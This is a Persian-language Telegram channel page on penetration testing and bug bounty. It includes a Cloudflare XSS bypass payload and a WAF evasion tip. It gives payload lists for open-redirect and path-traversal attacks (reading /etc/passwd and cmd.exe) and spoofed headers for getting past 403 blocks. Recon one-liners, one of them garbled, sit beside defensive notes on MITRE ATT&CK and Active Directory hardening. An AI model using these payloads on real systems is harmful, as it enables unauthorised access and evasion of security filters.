Try Hack Box – Telegram
Try Hack Box
5.76K subscribers
680 photos
65 videos
123 files
689 links
1 Nov 2020
1399/08/11
Learn penetration testing & Red Team
https://youtube.com/@tryhackbox
Channels :
@TryHackBoxOfficial ( RoadMap )
@TryHackBoxStory ( Story Hacking )
Contact : @ThbxSupport
Download Telegram
RCE Vulnerability Check List by THB Team.pdf
690.2 KB
🔖 چک لیست آسیب‌پذیری RCE

تیم TryHackBox یک چک لیست جامع و کاربردی برای شناسایی و بهره‌ برداری از آسیب‌پذیری‌های RCE آماده کرده. این چک لیست شامل روش‌های مختلف مثل Dependency Confusion، File Upload، SQL Injection، LFI، SSRF، XXE، Command Injection، Insecure Deserialization و SSTI هست و با لینک‌های مفید برای مطالعه بیشتر همراهه.

مطالعه کنید و نظراتتون رو برامون بنویسید


@TryHackBox | Github | YouTube | Group
#RCE #Vulnerability
8
XSS Bypass Cloudflare Payload:

"><img/src=x/onerro=6><img/src="1"/onerror​=alert(1);>


لینکدین خودش را از کار انداخت…
@TryHackBox
#XSS #Bypass #payload
110🎃3👍1
Forwarded from TryHackBox Story
مروری بر پست های گذشته

نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 1.

نفوذگران هنگام تلاش برای هک شرکت شما چه خطری را تهدید می کنند؟ قسمت 2.

زندانیان، 2 کامپیوتر و هک شبکه زندان.

جاسوسی‌های سایبرنتیک KGB - من به اطلاعات دشمن دسترسی دارم، پس هستم.

حمله خرس سیاه به چشم عقاب، عملیات بر علیه یانکی‌ها در مرزهای سایبرنتیک

شب‌گردی مخوف: جزئیات هولناک عملیات جاسوسی سایبری Moonlight Maze - بخش اول

شب‌گردی مخوف: جزئیات هولناک عملیات جاسوسی سایبری Moonlight Maze - بخش دوم

رمزگشایی تاریک بخش اول: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت

در رابطه با خبر باج ۳ میلیون دلاری

حمله بزرگ سایبری اخیر به بانک‌های ایرانی

گروه هکری #حنظله #Handala و فعالیت‌های آن علیه اسرائیل

ایمیل‌های بین آی‌آر لیکس و آرش بابایی

رمزگشایی تاریک بخش دوم: چگونه ایالات متحده از طریق بکدور پنهانی، ارتباطات جهانی را تحت کنترل گرفت

سه میلیون دلار باج پرداخت شد، آیا رقم نجومی بود؟

حملات طیف الکترومغناطیس بر علیه باطری گوشی‌های همراه
2
SE in Red Teaming by THB Team.pdf
1.2 MB
🔖 مهندسی اجتماعی در ردتیمینگ

این راهنمای خلاصه و عملی یک مرجع کاربردی برای طراحی و اجرای سناریوهای اجتماعی‌ مهندسی در عملیات‌های ردتیم است:

تاثیرات مهندسی اجتماعی
تکنیک های رایج مهندسی اجتماعی
ابزارها و تکنیک ها
ابزارهای اوسینت

⚠️ این آموزش صرفاً برای ارتقای امنیت و آگاهی سایبری است و هیچ استفادهٔ غیرمجاز از آن مجاز نیست

⭕️ شما کدام تکنیکِ مهندسی اجتماعی (فیشینگ، pretexting، یا baiting) رو بیش از همه برای سناریوهای ردتیم مؤثر می‌دونید؟ نظر خودتون رو بنویسید.


@TryHackBox | Github | YouTube | Group
#SE #RedTeam
#مهندسی_اجتماعی
🔥9
⚒️🪲 تب‌های مفید Burp Suite

📌 Proxy
— ترافیک HTTP/S بین مرورگر شما و سرور را رهگیری و تحلیل می‌کند.
📌 Repeater
— اجازه می‌دهد درخواست‌های HTTP مشخص را چندبار ارسال، ویرایش و آزمایش کنید.
📌 Intruder
— برای تست‌های خودکار مثل حملات سِری (brute-force)، فازینگ (fuzzing) و سایر سناریوهای خودکار به کار می‌رود.
📌 Extender
— امکان افزودن افزونه‌های سفارشی یا پلاگین‌های شخص ثالث برای افزایش قابلیت‌ها را فراهم می‌کند.

@TryHackBox
#tools #BurpSuite
🔥114
WBP-PVD THB Team.pdf
2.2 MB
🔖 پنتست به روش «جعبه‌سفید»: دیباگ آسیب‌ پذیری‌ های Python

عمیقاً واردِ کشف آسیب‌پذیری‌ ها در اپلیکیشن‌ های وب نوشته‌شده به Python شوید و یاد بگیرید چگونه در VS Code دیباگ کنید تا پیلود را در سراسر فرایند دنبال کنید.

محتوای راهنما:

نصب منابع لازم: VS Code، Python Debugger، Docker

ساختار فایل

کشف آسیب‌ پذیری‌ های Python

آسیب‌ پذیری‌ های رایج در Python

نکات برای بهبود تست به روش «جعبه‌سیاه» با استفاده از تحلیل کد

@TryHackBox | Github | YouTube | Group
#pentest #tools #python
👍41
هفتم آبانماه، «روز کوروش بزرگ» بر همه ایرانیان و ایرانی‌تباران فرخنده و همایون باد.

کوروش بزرگ نماد همبستگی اقوام ایرانی و عامل پیوند فرهنگی تاریخی ایرانزمین است.
کوروش بزرگ پیام آور صلح و دوستی، احترام به اقوام، دین و مذهب و فرهنگ و زبان مردم شاهنشاهی بزرگ ایران‌ دوره هخامنشی و پدید آورنده نخستین منشور حقوق بشر جهانی است.

ای انسان هر که باشی واز هر جا که بیایی
میدانم خواهی آمد
من کوروشم که برای پارسی ها این دولت وسیع را بنا نهادم
بدین مشتی خاک که تن مرا پوشانده رشک مبر

متن آرامگاه کوروش بزرگ
@TryHackBox
15👎2
ماتریس تاکتیک‌های MITRE ATT&CK
مراحل مختلف یک حمله سایبری (چرخه kill chain) را بر اساس مدل MITRE ATT&CK نشان می‌دهیم. هر بخش یک "تکنیک " است که مهاجمان برای نفوذ و موفقیت در حمله خود به کار می‌برند.

✍️نویسنده
@TryHackBox | The Chaos

#MITRE #Kill_Chain #Hacking #CyberSecurity
🔥7👍2
🗺 حمله سایبری یک فرآیند مرحله‌به‌مرحله است. مهاجم از جمع‌آوری اطلاعات شروع می‌کند، Tools می‌سازد، نفوذ می‌کند، در سیستم پنهان می‌شود، حرکت می‌کند، داده‌ها را می‌دزدد و در نهایت آن‌ها را خارج می‌کند.

📚مهمترین نکته برای شما به عنوان مدافع برای هر مرحله از این چرخه، یک اقدام دفاعی مشخص وجود دارد. شما با درک این مراحل می‌توانید:

--> از ورود مهاجم جلوگیری کنید (مثلاً با فیلتر ایمیل و وصله کردن سیستم).
--> حرکت او را در شبکه محدود کنید (با تقسیم‌بندی شبکه).
--> دسترسی او را بگیرید (با سیاست کمترین دسترسی).
--> داده‌های خود را ایمن نگه دارید (با پشتیبان‌گیری).
--> و در نهایت، اگر حمله‌ای رخ داد، به سرعت آن را شناسایی و پاسخ دهید (Incident response).
این نما به شما کمک می‌کند تا امنیت خود را به صورت لایه‌ای و مرحله‌ای تقویت کنید.


✍️نویسنده
@TryHackBox | The Chaos

#MITRE #Kill_Chain #Hacking #CyberSecurity
12
تمام اندپوینت ها را از یک فایل JS استخراج کنید و باگ خود را بگیرید .

- متد اول
waybackurls HOSTS | tac | sed "s#\\\\/&#92;/#\\/&#92;/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '\/'
'{if(length($2))print "https:\/\/"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s\/[;}\)>]\/\n\/g\" | grep -Po \" (L'1|\"](https?: )?[\/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['\"](https?:)?[\/1{1,2}[^'\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu

- متد دوم
cat JS.txt | grep -aop "(?<=(\"|\'|' ))\\/[a-zA-Z0-9?&=\\/\-#.](?= (\"||'|'))" | sort -u | tee JS.txt

@TryHackBox
#باگ_بانتی
#infosec #cybersec #bugbountytips
🔥74👍1
🔖 لیستی از مطالعه باگ بانتی : مجموعه‌ ای منتخب از مقالات و منابع برای شکارچیان باگ بانتی .

https://bb.vitorfalcao.com/
@TryHackBox
#bugbounty #باگ_بانتی
13
This media is not supported in your browser
VIEW IN TELEGRAM
نکته #باگ_بانتی استخراج URLهای فایل‌ های جاوااسکریپت از هر صفحه!
فراموش کن DevTools رو باز کنی از این بوک‌مارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی.
چرا مهمه:
سریع همه فایل‌های جاوااسکریپت لینک‌ شده رو جمع کن 
ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن 
عالی برای recon،کشف endpoint و دور زدن احراز هویت
کد بوک‌ مارکت:
javanoscript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javanoscript_urls.txt';a.click();})();

چطور استفاده کن: 
یه بوک‌مارکت جدید تو مرورگرت بساز. 
کد بالا رو تو فیلد URL بچسبون. 
به سایت هدف برو و بوک‌مارکت رو کلیک کن. 
فایل javanoscript_urls.txt با همه لینک‌های.js دانلود میشه.

حالا می‌تونی اینو به: 
LinkFinder 
SecretFinder 
JSParser 
یا تحلیل دستی بدی!
@TryHackBox
18👍2🔥2
🔖 میتونی این Bypass دستی مؤثر برای open redirect رو امتحان کنی

💢 ۱. تزریق Null-byte:
   ⦁ /
google.com%00/
   ⦁ //
google.com%00

💢 ۲. تغییرات(variations) انکودینگ Base64:
   ⦁ aHR0cDovL2dvb2dsZS5jb20=
   ⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   ⦁ //base64:d3d3Lmdvb2dsZS5jb20=/

💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:
   ⦁ //
GOOGLE.com/
   ⦁ //
GoOgLe.com/

💢 ۴.  توالی های UTF-8 طولانی:
   ⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)
   ⦁ %C0%AF%C0%AF%2F%
2Fgoogle.com

💢 ۵. طرح‌ های انکودینگ مخلوط:
   ⦁ /%68%74%74%70://
google.com
   ⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   ⦁ //base64:%2F%
2Fgoogle.com/

💢 ۶. نوتاسیون‌ های(notations) جایگزین دامنه:
   ⦁ //
google.com@127.0.0.1/
   ⦁ //
127.0.0.1.xip.io/
   ⦁ //0x7F000001/ (IP هگزادسیمال)

💢 ۷. کاراکترهای خاص Trailing:
   ⦁ //
google.com/#/
   ⦁ //
google.com/;&/
   ⦁ //
google.com/?id=123&//

💢 ۸. فرمت آدرس IP اکتال( Octal ):
   ⦁ http://0177.0.0.1/
   ⦁ http://00177.0000.0000.0001/

💢 ۹. تغییرات آدرس IP:
   ⦁ http://3232235777 (نوتاسیون دسیمال IP)
   ⦁ http://0xC0A80001 (نوتاسیون هگز IP)
   ⦁
http://192.168.1.1/

💢 ۱۰. Path traversal با انکودینگ:
    ⦁ /..%252f..%252f..%252fetc/passwd
    ⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    ⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe

💢 ۱۱. گنجاندن پروتکل inclusion:
    ⦁
ftp://google.com/
    ⦁ javanoscript:alert(1)//
google.com

💢 ۱۲. URLهای نسبی پروتکل: 
    -:////
google.com/ 
    -:///
google.com/

💢 ۱۳. موارد لبه redirect:
    ⦁ //
google.com/?q=//bing.com/
    ⦁ //
google.com?q=https://another-site.com/

💢 ۱۴. نوتاسیون IPv6:
    ⦁ http://[::1]/
    ⦁ http://[::ffff:
192.168.1.1]/

💢 ۱۵. انکودینگ دوگانه URL:
    ⦁ %252f%
252fgoogle.com (دو بار انکود شده)
    ⦁ %
255cgoogle.com

💢 ۱۶. ترکیب traversal و انکودینگ:
    ⦁ /%2E%2E/%2E%2E/etc/passwd
    ⦁ /%2e%2e%5c%2e%2e/etc/passwd

💢 ۱۷. مبتنی بر Reverse DNS:
    ⦁
https://google.com.reverselookup.com
    ⦁ //
lookup-reversed.google.com/

💢 ۱۸. پورت‌ های غیراستاندارد:
    ⦁
http://google.com:81/
    ⦁
https://google.com:444/

💢 ۱۹. پنهان‌ سازی یونیکد در مسیرها:
    ⦁ /%E2%80%
8Egoogle.com/
    ⦁ /%C2%
A0google.com/

💢 ۲۰. پنهان‌ سازی پارامترهای کوئری:
    ⦁ //
google.com/?q=http://another-site.com/
    ⦁ //
google.com/?redirect=https://google.com/

💢 ۲۱. استفاده از سمبل @ برای userinfo:
    ⦁
https://admin:password@google.com/
    ⦁ http://
@google.com

💢 ۲۲. ترکیب userinfo و traversal:
    ⦁
https://admin:password@google.com/../../etc/passwd

@TryHackBox
#بایپس
👍12
🔖 لیست تکنیک‌ های شناسایی (recon) که تقریباً هیچ‌ کسی امتحان نمیکنه
• اجرای CeWL روی product & API docs
• شمارش VHost و Bruteforcing با هدر هاست تنظیم‌ شده روی "localhost"
• بروت‌ فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...)
• شناسایی از روی Favicon
• کراولینگ سایت‌ ها با هدرهای user-agent مختلف

@TryHackBox
#باگ_بانتی #شناسایی
👍102
🟥 بسیاری از نفوذهای موفق به شبکه‌های ویندوزی، نه به دلیل باگ‌های نرم‌افزاری، بلکه به دلیل پیکربندی‌های ضعیف و اشتباه در سرویس Active Directory رخ می‌دهند.

🟦کلید اصلی امنیت، غیرفعال کردن پروتکل‌های قدیمی و ناامن
(مانند NTLM و LLMNR)

🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.

✍️نویسنده
@TryHackBox | The Chaos

#Active_Directory #AD #Windows #CyberSecurity
8👍2
سلب مسئولیت TryHackBox.pdf
679.7 KB
💢 این سلب مسئولیت شامل تمام آموزش ها، راهنماها و به طور کلی تمام محتوای منتشر شده توسط نویسنده ها در این کانال می‌ شود.

این کانال فقط برای اهداف آموزشی و پیشگیرانه است و در هیچ شرایطی به تشویق به نقض قوانین نمی‌ پردازد. به درخواست‌هایی که قوانین ایران را نقض می‌کنند پاسخی داده نخواهد شد. علاوه بر این، شما به تنهایی مسئول اقدامات و استفاده‌های خود از مطالب ارائه شده در این کانال خواهید بود. نه نویسنده و نه میزبان او نمی‌ توانند مسئول اقدامات شما، هر نوع که باشد، باشند.

@TryHackBox
#سلب_مسئولیت
11👍3🕊1
🔖 در تلاش برای بایپس WAF و تزریق پیلود XSS، تگ <details> را فراموش نکنید. اغلب توسط WAF مسدود نمیشود!

@TryHackBox
#باگ_بانتی #نکته
👍142👎1
🔖 از این هدرهای درخواست برای عبور از خطای 403 Forbidden استفاده کنید


Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1


@TryHackBox
#باگ_بانتی #نکته
👍13🔥5
نقشه ذهنی (MindMap) آرتیفکت‌ های DFIR #ویندوز مجموعه‌ ای از آرتیفکت‌ها که در هنگام اجرای عملیات دیجیتال فارنزیک و پاسخ به رویدادهای امنیتی (DFIR) در سیستم‌ های ویندوز، باید مورد توجه قرار گیرند.
@TryHackBox
#پاسخ_به_حادثه #dfir
👍5